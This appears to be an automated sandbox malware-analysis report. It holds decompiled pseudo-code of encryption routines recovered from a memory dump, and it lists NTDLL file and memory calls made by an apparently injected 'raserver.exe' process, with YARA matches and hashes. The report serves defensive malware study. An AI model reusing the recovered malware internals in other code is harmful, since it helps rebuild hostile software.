				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[6] =  *(_t87 + 0x18) & 0xff00ff00 |  *(_t87 + 0x18) & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t116[7] =  *(_t87 + 0x1c) & 0xff00ff00 |  *(_t87 + 0x1c) & 0x00ff00ff;
				if(_a20 != 0x100) {
					L7:
					return _t64 | 0xffffffff;
				} else {
					_t173 = _a8;
					_t74 = 0;
					_a16 = 0;
					while(1) {
						_t152 =  *(_t64 + 0x18);
						_t100 = ( *(_t173 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t173 + _t74 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t173 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t173 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t173 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t64 - 4);
						_t133 =  *_t64 ^ _t100;
						 *(_t64 + 0x1c) = _t100;
						_t102 =  *(_t64 + 4) ^ _t133;
						 *(_t64 + 0x20) = _t133;
						_t135 =  *(_t64 + 8) ^ _t102;
						 *(_t64 + 0x24) = _t102;
						 *(_t64 + 0x28) = _t135;
						if(_t74 == 6) {
							break;
						}
						_t112 = ( *(_t173 + 4 + (_t135 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t173 + 4 + (_t135 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t173 + 4 + (_t135 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t173 + 5 + (_t135 & 0x000000ff) * 4) & 0x000000ff ^  *(_t64 + 0xc);
						_t139 =  *(_t64 + 0x10) ^ _t112;
						 *(_t64 + 0x2c) = _t112;
						_t114 =  *(_t64 + 0x14) ^ _t139;
						 *(_t64 + 0x34) = _t114;
						_t74 = _a16 + 1;
						 *(_t64 + 0x30) = _t139;
						 *(_t64 + 0x38) = _t114 ^ _t152;
						_t64 = _t64 + 0x20;
						_a16 = _t74;
						if(_t74 < 7) {
							continue;
						} else {
							goto L7;
						}
						goto L9;
					}
					return 0xe;
				}
				L9:
			}
















            0x00402d87
            0x00402d87
            0x00402d87
            0x00402d87
            0x00402d88
            0x00402d8a
            0x00402d8c
            0x00402d8e
            0x00402d93
            0x00402d98
            0x00402d9c
            0x00402d9d
            0x00402da0
            0x00402da9
            0x00402db3
            0x00402dba
            0x00402dc3
            0x00402dce
            0x00402dd6
            0x00402ddf
            0x00402dea
            0x00402ded
            0x00402df0
            0x00402df5
            0x00402df8
            0x00402df8
            0x00402dfe
            0x00402e09
            0x00402e11
            0x00402e1a
            0x00402e25
            0x00402e2d
            0x00402e36
            0x00402e41
            0x00402e49
            0x00402e52
            0x00402e5d
            0x00402e65
            0x00402e6e
            0x00402e80
            0x00402e83
            0x00402f9d
            0x00402fa4
            0x00402e89
            0x00402e89
            0x00402e8c
            0x00402e8e
            0x00402e91
            0x00402e91
            0x00402ef6
            0x00402efb
            0x00402efd
            0x00402f03
            0x00402f05
            0x00402f0b
            0x00402f0d
            0x00402f10
            0x00402f16
            0x00000000
            0x00000000
            0x00402f72
            0x00402f78
            0x00402f7a
            0x00402f80
            0x00402f82
            0x00402f87
            0x00402f88
            0x00402f8b
            0x00402f8e
            0x00402f91
            0x00402f97
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f97
            0x00402fae
            0x00402fae
            0x00000000

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3955add1cadf525b3e4a80907b443ce367edc1197d7b562730b9c28a40cd2d77
            • Instruction ID: 0149ee043bedfde3c8459f7903ee06ccb1df595458764b7ffc78eed2c7d38170
            • Opcode Fuzzy Hash: 3955add1cadf525b3e4a80907b443ce367edc1197d7b562730b9c28a40cd2d77
            • Instruction Fuzzy Hash: 9C51C5B3E14A214BD3188F19CD50231BA92FFD8312B5F81BECD199B397CE74A9419A90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











            0x00401030
            0x0040105b
            0x0040105d
            0x00401063
            0x00401065
            0x00401065
            0x00401071
            0x00401076
            0x0040107c
            0x004010ac
            0x004010ae
            0x004010b4
            0x004010ba
            0x004010bc
            0x004010bc
            0x004010cb
            0x004010d0
            0x004010d6
            0x00401101
            0x00401103
            0x00401109
            0x0040110f
            0x00401111
            0x00401111
            0x00401120
            0x00401128
            0x0040112b
            0x0040114f
            0x00401156
            0x0040115d
            0x00401169
            0x0040116c
            0x0040116f
            0x00401173

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
            • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
            • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00416C93, Relevance: .0, Instructions: 24COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: aca4056b6d085de1f0144811f0053ce10585bcbd5347b813e9ca65d88c84da20
            • Instruction ID: ab64649cf60b4c99ef87a584fdaa308f732f86617723b8ec9f18b4d99e449ad4
            • Opcode Fuzzy Hash: aca4056b6d085de1f0144811f0053ce10585bcbd5347b813e9ca65d88c84da20
            • Instruction Fuzzy Hash: DDD0C222A9401699E106597D6C986A8EBF8ABAB030F5922DAC994AB562C04189614385
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: raserver.exe PID: 4632 Parent PID: 5680 raserver.exeCOMMON

            Executed Functions

            Function 02E59F84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46filenativeCOMMON
            Download Yara Rule
            APIs
            • NtCreateFile.NTDLL(00000060,00000000,.z`,02E54B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E54B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E59F7D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: .z`
            • API String ID: 823142352-1441809116
            • Opcode ID: efec63cd240fb5cf11851945e32908881a5439a4a74a989f01a3835f62bb1690
            • Instruction ID: 4bab342df64e03890fc0962d6374008196fe8d0c1bf7213e3fdffb09723a41b9
            • Opcode Fuzzy Hash: efec63cd240fb5cf11851945e32908881a5439a4a74a989f01a3835f62bb1690
            • Instruction Fuzzy Hash: 5E01E8B2251118AFCB18CF99DC95EEB77B9EF8C354F158248FA1DA7241C630E841CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E59F2A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
            Download Yara Rule
            APIs
            • NtCreateFile.NTDLL(00000060,00000000,.z`,02E54B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E54B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E59F7D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: .z`
            • API String ID: 823142352-1441809116
            • Opcode ID: 3f5f4b330ded4f919947bcb531d6ab0613897fee5750612e47818f428f6a1858
            • Instruction ID: 4622274fbbe242530b5327c0bbc9d2bd647ebc67ab68d520f29ffd7f58f7982b
            • Opcode Fuzzy Hash: 3f5f4b330ded4f919947bcb531d6ab0613897fee5750612e47818f428f6a1858
            • Instruction Fuzzy Hash: 8201B2B6211108BFCB58CF98DC95EEB77AAAF8C354F158248FA1DD7241D630E811CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E59F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
            Download Yara Rule
            APIs
            • NtCreateFile.NTDLL(00000060,00000000,.z`,02E54B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E54B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E59F7D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: .z`
            • API String ID: 823142352-1441809116
            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
            • Instruction ID: e0bb806f44614ffa8601f546c68265dfc9ab8b68e75dc7dcacaf466373fae932
            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
            • Instruction Fuzzy Hash: 74F0B2B2210208ABCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E59FDA, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
            Download Yara Rule
            APIs
            • NtReadFile.NTDLL(02E54D42,5EB6522D,FFFFFFFF,02E54A01,?,?,02E54D42,?,02E54A01,FFFFFFFF,5EB6522D,02E54D42,?,00000000), ref: 02E5A025
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 4bcf3f2468b0206d6ca4804f9efc63f3132d5c5b28a6e904da62520f24fb2a95
            • Instruction ID: bec1a897ef445984967faffe8afaba56600b35d44c1946af1386c8b9db262296
            • Opcode Fuzzy Hash: 4bcf3f2468b0206d6ca4804f9efc63f3132d5c5b28a6e904da62520f24fb2a95
            • Instruction Fuzzy Hash: F3F0F4B2210208ABCB14DF98DC90EEB7BADAF8C354F158248BE0D97341C670E811CBE0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E59FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
            Download Yara Rule
            APIs
            • NtReadFile.NTDLL(02E54D42,5EB6522D,FFFFFFFF,02E54A01,?,?,02E54D42,?,02E54A01,FFFFFFFF,5EB6522D,02E54D42,?,00000000), ref: 02E5A025
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
            • Instruction ID: dd7f0a0076f72022131e527f2b44166e33177fe90e83b4b858701f8cbec442f3
            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
            • Instruction Fuzzy Hash: B2F0B7B2210208AFCB14DF89DC90EEB77ADEF8C754F158259BE1D97241D630E811CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
            Download Yara Rule
            APIs
            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E42D11,00002000,00003000,00000004), ref: 02E5A149
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
            • Instruction ID: 7dd0f97c3e88ca9cba91b6f4f56ad8b4a9238d97c8a533a8144f019aeb594cdf
            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
            • Instruction Fuzzy Hash: 17F015B2210218ABCB14DF89CC90EAB77ADAF88750F118259BE0897241C630F811CBE0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A05B, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
            Download Yara Rule
            APIs
            • NtClose.NTDLL(02E54D20,?,?,02E54D20,00000000,FFFFFFFF), ref: 02E5A085
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: c941a1a3ac21c89f1edf3821fd80a8c460c352b5e5eafd6414a6318359be2091
            • Instruction ID: fc3b67b8559426571ab53e4395aedc1e8bde476fb6bb2272adc9127fc67efffd
            • Opcode Fuzzy Hash: c941a1a3ac21c89f1edf3821fd80a8c460c352b5e5eafd6414a6318359be2091
            • Instruction Fuzzy Hash: 8DE0C2762002106BD710EBD8CC45FD77769EF48750F144196BE0C5B342C530FA0087E0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
            Download Yara Rule
            APIs
            • NtClose.NTDLL(02E54D20,?,?,02E54D20,00000000,FFFFFFFF), ref: 02E5A085
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
            • Instruction ID: 5b817ec16ad0636d7bda4b74c66306e213681681e3c83715180b2c0e6f9190a9
            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
            • Instruction Fuzzy Hash: 7CD012752502146BD710EB98CC45F97775DEF44750F154555BA185B241C530F50086E0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: d04c21647924f6ab994133addc074a714981c4d50052cd340b43f218e3d9bf00
            • Instruction ID: dac5104f2926a45a8a42ff0400c6eb77f273b4d9c1be862ebb8bc45dec247eca
            • Opcode Fuzzy Hash: d04c21647924f6ab994133addc074a714981c4d50052cd340b43f218e3d9bf00
            • Instruction Fuzzy Hash: 339002A1652041567945B16944045474406ABE0285791C013A1406950C866AE857E661
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 1c402a6d89f4675c79b91e2cc0cf42b087c27aefcf73eff3b1eff2c599ca6024
            • Instruction ID: 8119edb1f12027a6c2e5bb65abf3efec071711a111786376164fdf6e094b7e45
            • Opcode Fuzzy Hash: 1c402a6d89f4675c79b91e2cc0cf42b087c27aefcf73eff3b1eff2c599ca6024
            • Instruction Fuzzy Hash: D29002B161100417F5116169450474704099BD0285F91C413A0416558D979AD953B161
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: b9325a0528200344d5839d52ccc42467f8263ff8c27ad33ca3cc19fb40a2e1ec
            • Instruction ID: dd48d0ccc4a4d8cafe7aac32c4c4994e9a0dc9cfb7d7a873fe404f61fd565066
            • Opcode Fuzzy Hash: b9325a0528200344d5839d52ccc42467f8263ff8c27ad33ca3cc19fb40a2e1ec
            • Instruction Fuzzy Hash: B19002A5621000073505A569070454704469BD5395351C022F1007550CD765D8626161
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: fb91f07fef6b319c317bdb133886931e3cec504a1a0768e028d07440afc975d9
            • Instruction ID: c1af7d101b0d4a107fab9c9bc1f6d3fb36b1819655229520654b4fa06b3f8061
            • Opcode Fuzzy Hash: fb91f07fef6b319c317bdb133886931e3cec504a1a0768e028d07440afc975d9
            • Instruction Fuzzy Hash: 1C9002F161100406F5407169440478604059BD0345F51C012A5056554E879DDDD676A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ce5107157c8bb180b5275ee1c88bc8cb81b156f280cbbff1a461695ec44f5ed1
            • Instruction ID: f1cb36023559c0ab811a3fcbcd74fa9465eb1cb8fa56b547b7d95692b99d84a7
            • Opcode Fuzzy Hash: ce5107157c8bb180b5275ee1c88bc8cb81b156f280cbbff1a461695ec44f5ed1
            • Instruction Fuzzy Hash: A99002E161200007750571694414656440A9BE0245B51C022E1006590DC669D8927165
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: bce56bc4a163526cf3f4126014bd30e9ae91caeb941ff763c071a145cdf174dc
            • Instruction ID: 560251e4adf346b37c3f5e1fa463abb783dbcd4cf08dd5da48a6300623d93300
            • Opcode Fuzzy Hash: bce56bc4a163526cf3f4126014bd30e9ae91caeb941ff763c071a145cdf174dc
            • Instruction Fuzzy Hash: 019002E175100446F50061694414B460405DBE1345F51C016E1056554D875DDC537166
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 68bc8eab0213a49f81c15439ffafbb85d3f74f405b0256247a57f2800d8eeabf
            • Instruction ID: 4c93eb26439e6b7add2246988c2f44f1e5476b7733f05d938cc1b265af6ee0ba
            • Opcode Fuzzy Hash: 68bc8eab0213a49f81c15439ffafbb85d3f74f405b0256247a57f2800d8eeabf
            • Instruction Fuzzy Hash: 479002B161504846F54071694404A8604159BD0349F51C012A0056694D9769DD56B6A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ffcc71e426c155c3cd5276d95074f3cf866936c431a6e9df5828836e403434d8
            • Instruction ID: e760ae9bb04f05cc80cec21d2f285555c1e5feb3540cab3b12355ab1b70b776b
            • Opcode Fuzzy Hash: ffcc71e426c155c3cd5276d95074f3cf866936c431a6e9df5828836e403434d8
            • Instruction Fuzzy Hash: 529002A162180046F60065794C14B4704059BD0347F51C116A0146554CCA59D8626561
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 10ad4a7e66b5a13be82342a6c68fd3092771be6991aa024e289dccdaa4c963ef
            • Instruction ID: c4ba53f6f54f8c82aec129cf102490d8a7e775845e6cf927049e4b1e6e627a6f
            • Opcode Fuzzy Hash: 10ad4a7e66b5a13be82342a6c68fd3092771be6991aa024e289dccdaa4c963ef
            • Instruction Fuzzy Hash: 9A9002B161100806F5807169440468A04059BD1345F91C016A0017654DCB59DA5A77E1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ab00066ef9c16f2a566b9ab687072beb0914ec9b612c65b6da75e306eeb86c3f
            • Instruction ID: 8c5e0dd6960350d870ba5392700d616fc549887576106e016b37593e0ae371ae
            • Opcode Fuzzy Hash: ab00066ef9c16f2a566b9ab687072beb0914ec9b612c65b6da75e306eeb86c3f
            • Instruction Fuzzy Hash: 709002B161100846F50061694404B8604059BE0345F51C017A0116654D8759D8527561
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: beef11311f44ae6210353898e851ee837edd004420acc4694843e16dc6fa457c
            • Instruction ID: cbb94c60728da9e0f72d93ae134a4aa56ae4d1509c510eca7d44796144822148
            • Opcode Fuzzy Hash: beef11311f44ae6210353898e851ee837edd004420acc4694843e16dc6fa457c
            • Instruction Fuzzy Hash: D59002B161108806F5106169840478A04059BD0345F55C412A4416658D87D9D8927161
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 99136bc22c59b2dfe03d5d2593cf4014f35c1ff1cb5e7aee40e152ceea18b508
            • Instruction ID: ff375a8166285a021fc9c332fcec961db2d53a184ec2b508e7683b9afadd3e86
            • Opcode Fuzzy Hash: 99136bc22c59b2dfe03d5d2593cf4014f35c1ff1cb5e7aee40e152ceea18b508
            • Instruction Fuzzy Hash: E19002B161100406F50065A9540868604059BE0345F51D012A5016555EC7A9D8927171
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: f801e2eb9f2f6a9dc298abc319ec63430db019f4cdad301e779db83d6eea31a1
            • Instruction ID: 2bf4d57b456b2d0c1a8d9e27c24963093e85074382c7e8b9d43f5f7344c491a4
            • Opcode Fuzzy Hash: f801e2eb9f2f6a9dc298abc319ec63430db019f4cdad301e779db83d6eea31a1
            • Instruction Fuzzy Hash: EC9002B172114406F5106169840474604059BD1245F51C412A0816558D87D9D8927162
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04469780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
